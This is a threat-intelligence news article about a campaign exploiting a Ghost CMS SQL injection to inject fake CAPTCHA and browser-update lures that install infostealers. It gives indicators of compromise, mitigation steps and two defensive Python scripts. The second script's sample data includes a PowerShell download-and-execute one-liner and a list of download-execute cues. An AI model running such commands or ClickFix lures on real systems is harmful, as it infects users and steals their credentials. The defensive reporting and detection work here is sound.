LIVE NEWSROOM · --:-- · June 2, 2026

DriveSurge Hijacks 700+ Sites to Spread LummaC2 via ClickFix


A threat actor tracked as DriveSurge exploited CVE-2026-26980 — a critical SQL injection (SQLi — a vulnerability that allows an attacker to manipulate database queries by injecting malicious SQL code) flaw in Ghost CMS (an open-source content management system popular with publishers and educational institutions) affecting versions 3.24.0 through 6.19.0 — to compromise more than 700 legitimate websites and inject malicious JavaScript that displays fake Cloudflare CAPTCHA dialogs and browser update prompts. Visitors who interact with these prompts unknowingly execute PowerShell commands that install LummaC2 (a widely-deployed commercial information stealer — malware that exfiltrates browser credentials, session cookies, and cryptocurrency wallet data) or Rhadamanthys (a competing infostealer sold on underground forums). Silent Push researchers identified DriveSurge on May 30, 2026, characterizing it as an Initial Access Broker (IAB) — a criminal service that sells victim device footholds to downstream threat actors on a Pay-Per-Install basis.

// 01 DriveSurge: Technical Details

CVE-2026-26980 is a critical SQL injection vulnerability in Ghost CMS versions 3.24.0 through 6.19.0. An unauthenticated attacker can submit a crafted HTTP request to Ghost's API that manipulates the underlying database query, extracting the Admin API Key (a credential that provides full administrative access to the Ghost installation — the ability to create, edit, and delete content, and to configure the CMS). Ghost has not published CVSS (Common Vulnerability Scoring System — a 0–10 severity scale) scores for CVE-2026-26980 at time of writing; SQL injection vulnerabilities that grant unauthenticated administrative access to web applications typically score 9.1–9.8 (Critical range) under CVSS v3.1.

DriveSurge's attack chain against CVE-2026-26980 proceeds in four steps:

  • Exploitation: Send a crafted SQL injection payload to the Ghost API, extracting the Admin API Key from the site's database without authentication
  • Injection: Use the extracted Admin API Key to authenticate to Ghost's Content API and inject a malicious JavaScript snippet into site posts and pages — content that every visitor to the compromised site will load
  • Social engineering delivery: The injected script displays one of two deceptive browser overlays depending on the victim's user agent and session context
  • Payload execution: When the victim complies with the fake dialog, their machine executes a PowerShell command (or keyboard shortcut) that downloads and runs the LummaC2 or Rhadamanthys infostealer

The two delivery techniques — ClickFix and FakeUpdate — are distinct social engineering lures:

ClickFix: Displays a fake Cloudflare "Verify you are human" CAPTCHA or browser security dialog. The dialog instructs the visitor to press Windows + R, paste a command into the Run dialog, and press Enter. The command that the page automatically copies to the clipboard is a PowerShell one-liner that downloads and executes the malware payload. ClickFix abuses user trust in Cloudflare's ubiquitous CAPTCHA — a brand virtually all web users recognize as a legitimate security check.

FakeUpdate: Displays a browser-specific update notification impersonating Chrome, Firefox, Edge, Safari, or one of ten additional browsers. The page prompts the visitor to press Ctrl+Shift+Enter to apply the update, which instead executes a clipboard-hijacked malicious command. DriveSurge maintains browser-specific templates so the fake update visually matches the visitor's actual browser.

DriveSurge routes victim installations through a sophisticated traffic distribution system (TDS — a system that routes web traffic based on visitor characteristics such as geolocation, user agent, and referrer to maximize conversion rates) called zTDS, which allows DriveSurge to sell specific victim segments to different downstream malware operators.

DriveSurge ClickFix attack chain — Ghost CMS to LummaC2 infection

// 02 Exploitation Status and Threat Landscape

CVE-2026-26980 is being actively exploited in the wild as of May–June 2026. The 700+ compromised sites identified by Silent Push represent a confirmed, operational infection campaign — not a theoretical risk.

LummaC2 is a well-established commercial infostealer (malware sold as a subscription service to criminal operators) that targets browser-stored credentials and session cookies, cryptocurrency wallet files, two-factor authentication (2FA) app data, and files matching sensitive naming patterns (.key, .wallet, .env, tax documents). A successful LummaC2 infection on a developer or finance professional's machine effectively transfers all stored cloud platform credentials and financial accounts to the attacker.

Rhadamanthys is a competing infostealer with similar credential-harvesting capabilities that additionally targets VPN (Virtual Private Network) client credentials, corporate password managers, and cryptocurrency hardware wallet seeds.

DriveSurge's IAB business model means that the initial LummaC2 installation is not the final attack. Once credentials are harvested and sold, downstream purchasers may use them for ransomware deployment, business email compromise fraud, or corporate network intrusion — meaning a single visit to a compromised Ghost CMS site can be the entry point for a sophisticated enterprise breach weeks later.

Silent Push identified eight distinct infrastructure fingerprints for tracking DriveSurge, including malicious inject patterns (t.js with site parameter), SHA256-derived filename patterns, .icu TLD (Top-Level Domain) domain clusters, and specific nameserver configurations. Active C2 infrastructure confirmed at time of reporting: 147[.]45[.]42[.]205:8133 (payload server) and 46[.]226[.]166[.]57.

MITRE ATT&CK: T1190 (Exploit Public-Facing Application) for initial compromise, T1566.002 (Phishing: Spearphishing Link) for the ClickFix/FakeUpdate social engineering delivery, T1555.003 (Credentials from Password Stores: Credentials from Web Browsers) for LummaC2 credential harvesting.

// 03 Who Is Affected

Ghost CMS administrators: Any organization running Ghost CMS versions 3.24.0 through 6.19.0 is vulnerable to CVE-2026-26980. Silent Push found the 700+ compromised sites concentrated in education and technology sectors — universities, research institutions, developer documentation sites, and technology news publishers. These are high-traffic, high-trust destinations whose visitors are exactly the technically sophisticated users DriveSurge's downstream clients want to target for credential harvesting.

Site visitors: Any visitor to a compromised Ghost CMS site during the attack window who interacted with a Cloudflare CAPTCHA dialog or browser update notification may have installed LummaC2 or Rhadamanthys. Users on Windows systems are the primary target (the ClickFix PowerShell delivery is Windows-specific); macOS ClickFix variants exist but were not confirmed in this campaign.

Organizations with infected employees: Since LummaC2 targets corporate VPN credentials, SSO (Single Sign-On) session tokens, and business password managers, a single infected developer's laptop can expose an entire organization's cloud and SaaS environment.

// 04 What You Should Do Right Now

  • Patch Ghost CMS immediately: Update to the latest Ghost version to receive the CVE-2026-26980 fix. Ghost publishes security updates at ghost.org/releases. If immediate patching is not possible, restrict access to the Ghost API endpoint at the network/WAF level while planning the update.
  • Audit Ghost Admin API logs: Check your Ghost admin panel for unauthorized API activity — unexpected posts, page modifications, or theme changes. If malicious JavaScript was injected, it may appear as an inline <script> tag in post content or as a modified theme file.
  • Scan site content for injected scripts: Use your CMS or a web application scanner to search published posts and pages for injected JavaScript, particularly code that contains references to t.js, first-node[.]rocks, cptoptious[.]com, or beacontrace[.]bond.
  • Alert users if site was compromised: If you confirm your Ghost CMS site was serving malicious content, notify your audience via alternative channels (email newsletter, social media) about the dates the injection was active and advise affected visitors to scan their machines and rotate browser-stored credentials.
  • Block DriveSurge IOCs at the perimeter: Add the confirmed C2 infrastructure to firewall and proxy blocklists:
      • 147.45.42.205:8133
      • 46.226.166.57
      • beacontrace[.]bond
      • cptoptious[.]com
      • first-node[.]rocks (ext-b pattern)
  • Instruct users to reject unexpected dialogs: Remind staff and end users that legitimate Cloudflare verification pages never ask them to open a Run dialog or paste commands. A CAPTCHA that asks for keyboard shortcuts or clipboard paste is always malicious.
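The content audit described in the steps above can be automated. The following is an added example, not Ghost's own tooling or anything published by Silent Push: it parses post or page HTML with Python's standard-library HTML parser, collects every script tag, and flags those that reference the indicators named in this article (first-node[.]rocks, cptoptious[.]com, beacontrace[.]bond, or a t.js loader with a query string). The sample posts are constructed for the demonstration; the "t.js loader pattern" check is a heuristic drawn from the article's description, so tune it against your own theme's legitimate assets before relying on it.

```python
"""Scan Ghost post/page HTML for injected <script> tags.

Added example for this article; not Ghost CMS code and not a Silent Push tool.
Indicators are taken from the article and kept defanged in the source.
"""
from html.parser import HTMLParser
import re

DEFANGED_INDICATORS = ["first-node[.]rocks", "cptoptious[.]com", "beacontrace[.]bond"]
# Refang once so matching works against real post content.
INDICATORS = [d.replace("[.]", ".") for d in DEFANGED_INDICATORS]
# The article describes the inject as "t.js with site parameter"; this is a heuristic.
INJECT_SCRIPT_RE = re.compile(r"/t\.js(\?|$)")


class ScriptCollector(HTMLParser):
    """Collects (src, inline_body) for every <script> element in a document."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = [dict(attrs).get("src"), ""]

    def handle_data(self, data):
        # HTMLParser delivers script bodies as raw data; accumulate in case of chunks.
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(tuple(self._current))
            self._current = None


def find_injected_scripts(html):
    """Return a list of (reason, evidence) findings for one post's HTML."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, body in parser.scripts:
        target = src or body
        lowered = target.lower()
        matched = next((ind for ind in INDICATORS if ind in lowered), None)
        if matched:
            findings.append((f"references indicator {matched}", target[:120]))
        elif src and INJECT_SCRIPT_RE.search(src):
            findings.append(("t.js loader pattern", src[:120]))
    return findings


def scan_posts(posts):
    """Map slug -> findings for every post that has at least one finding."""
    report = {}
    for slug, html in posts.items():
        findings = find_injected_scripts(html)
        if findings:
            report[slug] = findings
    return report


# Constructed sample posts (not real site content).
SAMPLE_POSTS = {
    "clean-post": '<p>Hello</p><script src="https://example.org/assets/prism.js"></script>',
    "injected-loader": '<p>Intro</p><script src="https://first-node.rocks/t.js?site=docs-example"></script>',
    "injected-inline": "<script>var c='https://cptoptious.com/';document.write('<div id=captcha></div>');</script>",
    "injected-other-cdn": '<script src="https://cdn.example-static.net/t.js?site=1"></script>',
}

if __name__ == "__main__":
    for slug, findings in scan_posts(SAMPLE_POSTS).items():
        for reason, evidence in findings:
            print(f"{slug}: {reason}: {evidence}")
```

In practice you would feed this the HTML of every post and page exported from the Ghost admin (or fetched via the Content API), and also run it over theme files, since the article notes the inject may live in a modified theme rather than in post content.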

// 05 Background: Understanding the Risk

ClickFix as a technique has grown substantially in sophistication since it was first documented in 2024. The attack is effective because it exploits user trust in recognized brands (Cloudflare, browser vendors) and leverages the clipboard as an execution path that bypasses most browser security controls. No file is downloaded to a visible location; the victim themselves initiates the execution by pasting and pressing Enter. This means many endpoint security products that scan file downloads or monitor browser activity do not catch ClickFix delivery until the PowerShell command has already launched.
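Because the download is never written to disk by the browser, the point at which ClickFix becomes visible on the endpoint is process creation: a PowerShell (or similar) process whose parent is the Windows shell that hosts the Run dialog, carrying a download-and-execute command line. The following is an added example of that detection logic, not from the article or any vendor product. It runs over constructed process-creation events; the cue list, the parent-process set and the alert threshold are assumptions to be tuned against your own telemetry, and the IP in the sample is a documentation address, not one of the article's IOCs.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example for this article. Events are constructed; field names mirror
a generic (parent image, image, command line) record rather than any
specific EDR schema.
"""
from dataclasses import dataclass
import re


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


# The Run dialog is hosted by explorer.exe, so the pasted command is its child.
RUN_DIALOG_PARENTS = {"explorer.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Download-and-execute cues (assumed list, not from the article).
CUES = [
    r"invoke-webrequest", r"\biwr\b", r"\birm\b", r"invoke-expression", r"\biex\b",
    r"downloadstring", r"-enc\w*\s", r"-w(indowstyle)?\s+hidden", r"http[s]?://",
]
CUE_RE = re.compile("|".join(CUES), re.IGNORECASE)


def classify(ev):
    """Return ("alert", hits) for a likely ClickFix execution, else ("ok", hits)."""
    if ev.parent_image.lower() not in RUN_DIALOG_PARENTS or ev.image.lower() not in SHELL_IMAGES:
        return "ok", []
    hits = sorted({m.group(0).lower() for m in CUE_RE.finditer(ev.command_line)})
    has_url = any(h.startswith("http") for h in hits)
    # A URL from the Run dialog, or two or more cues together, is enough to raise.
    if has_url or len(hits) >= 2:
        return "alert", hits
    return "ok", hits


def run_detection(events):
    """Return [(event, hits)] for every event that classifies as an alert."""
    alerts = []
    for ev in events:
        verdict, hits = classify(ev)
        if verdict == "alert":
            alerts.append((ev, hits))
    return alerts


# Constructed events; 198.51.100.7 is a TEST-NET-2 documentation address.
SAMPLE_EVENTS = [
    ProcEvent("powershell.exe", "explorer.exe",
              'powershell -w hidden -c "iwr http://198.51.100.7:8133/x | iex"'),
    ProcEvent("powershell.exe", "cmd.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent("powershell.exe", "explorer.exe", "powershell -NoProfile -Command Get-Process"),
    ProcEvent("mshta.exe", "explorer.exe", "mshta https://example.invalid/p.hta"),
]

if __name__ == "__main__":
    for ev, hits in run_detection(SAMPLE_EVENTS):
        print(f"ALERT {ev.parent_image} -> {ev.image}: {hits}")
```

The parent-process condition is what separates a pasted Run-dialog command from the scheduled or scripted PowerShell that an enterprise runs all day; the cue count keeps an interactive user opening a plain shell from raising an alert.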

The use of a CMS vulnerability as the initial access vector — rather than compromising web server infrastructure directly — is particularly insidious. Ghost CMS has a strong reputation in the developer and education communities. Visitors approach Ghost-powered sites with high baseline trust, making them more likely to interact with prompts that appear when browsing. A site that normally publishes authoritative technical documentation or educational content becomes the delivery mechanism for malware without the site owner's knowledge.

The IAB model amplifies the downstream impact. DriveSurge does not itself deploy ransomware or conduct bank fraud. It sells access — the initial credential theft and machine control — to other criminal operators through zTDS. This means the 700+ compromised sites feed a pipeline: LummaC2 credential batches are sold to ransomware affiliates who use stolen VPN credentials for network access, or to BEC (Business Email Compromise) operators who use harvested email credentials for invoice fraud. Security teams investigating a ransomware intrusion six weeks from now may trace it back to an employee who visited a compromised educational website today.

Ghost CMS is used by thousands of publications, corporate blogs, and academic institutions globally. The SQL injection vulnerability in CVE-2026-26980 is straightforward to exploit — any script kiddie with a basic understanding of web APIs can automate the Admin API key extraction. Until Ghost sites are patched across the ecosystem, the DriveSurge campaign will continue expanding its infection pool.

// 06 Conclusion

DriveSurge is actively hijacking Ghost CMS sites via CVE-2026-26980 and turning them into ClickFix and FakeUpdate delivery platforms for LummaC2 and Rhadamanthys infostealers. Ghost CMS administrators should update immediately and audit their sites for injected JavaScript. Any Windows user who recently encountered an unexpected Cloudflare CAPTCHA asking them to press Windows + R on an educational or technology publication site should assume compromise and rotate all browser-stored credentials — DriveSurge's credential harvest feeds downstream ransomware and BEC campaigns that surface weeks after the initial infection.

For any query contact us at contact@cipherssecurity.com

    Team Ciphers Security

    The Ciphers Security editorial team — practitioners covering daily threat intel, CVE deep-dives, and hands-on cybersecurity research.
